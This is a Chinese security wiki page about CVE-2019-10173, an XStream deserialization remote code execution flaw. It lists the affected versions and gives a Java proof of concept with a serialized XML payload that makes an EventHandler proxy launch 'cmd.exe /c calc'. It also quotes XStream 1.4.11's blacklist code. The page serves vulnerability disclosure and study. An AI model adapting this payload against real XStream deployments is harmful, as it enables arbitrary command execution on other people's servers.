menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-10173)Xstream 远程代码执行漏洞 chevron_right (CVE-2019-10173)Xstream 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-10173)Xstream 远程代码执行漏洞.md
    3.28 KB / 2021-07-15 20:11:11
        (CVE-2019-10173)Xstream 远程代码执行漏洞
==========================================

一、漏洞简介
------------

Xstream 1.4.10版本存在反序列化漏洞CVE-2013-7285补丁绕过。

二、漏洞影响
------------

XStream \<= 1.4.6

XStream = 1.4.10

三、复现过程
------------

### poc

    package com.bigo;

    import com.thoughtworks.xstream.XStream;

    import java.beans.EventHandler;
    import java.io.IOException;
    import java.util.Set;
    import java.util.TreeSet;

    /**
     * Created by cfchi on 2019/7/26.
     */
    public class Main {
        public static String expGen(){
            XStream xstream = new XStream();
            Set<Comparable> set = new TreeSet<Comparable>();
            set.add("foo");
            set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start"));
            String payload = xstream.toXML(set);
            System.out.println(payload);
            return payload;
        }
        public static void main(String[] args) throws IOException {
            expGen();
            XStream xStream = new XStream();
            String payload = "<sorted-set>\n" +
                    "    <string>foo</string>\n" +
                    "    <dynamic-proxy>\n" +
                    "    <interface>java.lang.Comparable</interface>\n" +
                    "        <handler class=\"java.beans.EventHandler\">\n" +
                    "            <target class=\"java.lang.ProcessBuilder\">\n" +
                    "                <command>\n" +
                    "                    <string>cmd.exe</string>\n" +
                    "                    <string>/c</string>\n" +
                    "                    <string>calc</string>\n" +
                    "                </command>\n" +
                    "            </target>\n" +
                    "     <action>start</action>"+
                    "        </handler>\n" +
                    "    </dynamic-proxy>\n" +
                    "</sorted-set>\n";
           xStream.fromXML(payload);
        }
    }

### 1.4.7版本白名单

![](./resource/(CVE-2019-10173)Xstream远程代码执行漏洞/media/rId26.png)

### 1.4.10版本,黑名单未开启

![](./resource/(CVE-2019-10173)Xstream远程代码执行漏洞/media/rId28.png)

### 1.4.11版本,黑名单开启

#### 黑名单

    private class InternalBlackList implements Converter {
        private InternalBlackList() {
        }

        public boolean canConvert(Class type) {
            return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized && type != null && (type.getName().equals("java.beans.EventHandler") || type.getName().endsWith("$LazyIterator") || type.getName().startsWith("javax.crypto."));
        }

        public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
            throw new ConversionException("Security alert. Marshalling rejected.");
        }

        public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
            throw new ConversionException("Security alert. Unmarshalling rejected.");
        }
    }

![](./resource/(CVE-2019-10173)Xstream远程代码执行漏洞/media/rId31.png)

参考链接
--------

> http://www.polaris-lab.com/index.php/archives/658/
    links
    file_download